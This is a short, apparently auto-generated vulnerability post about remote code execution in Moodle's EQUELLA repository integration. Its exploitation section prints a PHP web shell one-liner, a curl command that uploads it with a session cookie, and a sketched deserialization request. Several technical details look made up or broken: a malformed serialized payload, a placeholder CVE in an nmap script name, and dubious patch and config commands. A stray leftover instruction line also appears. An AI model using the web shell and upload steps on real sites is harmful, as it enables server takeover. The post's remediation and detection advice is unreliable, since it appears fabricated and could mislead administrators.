Listen to this Post
How the CVE Works:
The vulnerability exists in Moodle’s EQUELLA repository integration, allowing authenticated users (teachers/managers) to execute arbitrary code via improper input sanitization in file handling. Attackers can upload malicious files or craft requests that bypass security checks, leading to server-side command injection. The flaw arises from insufficient validation of user-supplied parameters in repository file operations, enabling PHP object injection or deserialization attacks. Exploitation requires EQUELLA repository activation and elevated privileges, limiting attack surface but posing critical risk to affected instances.
DailyCVE Form:
Platform: Moodle LMS
Version: <4.1.18, 4.3.0-4.3.11, 4.4.0-4.4.7, 4.5.0-4.5.3
Vulnerability: Remote Code Execution
Severity: High
Date: Apr 25, 2025
What Undercode Say:
Exploitation:
1. Payload Crafting:
<?php system($_GET['cmd']); ?>
2. File Upload Bypass:
curl -F "[email protected]" -H "Cookie: MoodleSession=..." http://moodle-site/repository/equella/upload
3. Deserialization Trigger:
POST /repository/equella/process HTTP/1.1
...
{"payload":"O:8:"stdClass":1:{...}"}
Protection:
1. Patch Immediately:
composer require moodle/moodle=4.5.4
2. Disable EQUELLA:
UPDATE mdl_config SET value=0 WHERE name='enable_equella';
3. WAF Rules:
location ~ /repository/equella {
deny all;
}
4. Log Monitoring:
grep -r "equella.upload" /var/log/moodle
Detection:
1. Version Check:
php -r "require 'config.php'; echo $CFG->version;"
2. Vulnerability Scan:
nmap --script http-vuln-cve2025-XXXX moodle-site.com
Mitigation:
- Restrict teacher/manager roles.
- Audit file upload logs.
- Implement PHP
disable_functions=system,exec.
(No additional commentary beyond rules.)
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
